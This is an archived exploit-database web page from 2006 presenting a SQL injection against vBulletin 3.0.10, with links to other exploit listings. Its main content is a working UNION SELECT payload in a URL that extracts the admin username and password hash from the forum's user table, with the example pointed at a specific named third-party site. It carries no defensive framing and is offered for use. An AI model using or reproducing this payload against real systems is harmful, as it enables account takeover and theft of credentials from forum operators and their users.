exploits , vulnerabilities , articles , vBulletin 3.0.10 Version SQL Injection

2007-04-14 Vbulletin 3.6.5 Sql Injection ! [misc.php] Exploit
2006-04-13 vBulletin ImpEx <= 1.74 Remote Command Execution Exploit
2005-02-15 vBulletin 3.x "forumdisplay.php" Remote Code Execution Exploit

2006-05-30

vBulletin 3.0.10 Version SQL Injection

Rated as : Critical Risk
Exp Code :

######################################################
#      vBulletin 3.0.10 Version SQL Injection        #
#                  SpC-x | Nukedx                    #
######################################################
# Credit : SpC-X | Nukedx                            #
# Site    : http://www.Cyber-security.org            #
######################################################

Code :

http://www.target.com/path/portal.php?id=54&a=viewfeature&featureid=[SQL]

Example :

http://ckknight.wowinterface.com/portal.php?id=54&a=viewfeature&featureid=99999/**/UNION/**/SELECT/**/0,1,2,3,4,username,6,7,8,9,10,11,12,password/**/from/**/user/**/where/**/userid=1/*


securitydot.net - 2006-05-30

Exploits - newest 10 RSS | More

2007-06-15 56174 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33447 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41596 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28797 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19323 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16347 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 18982 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16222 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33047 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16862 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit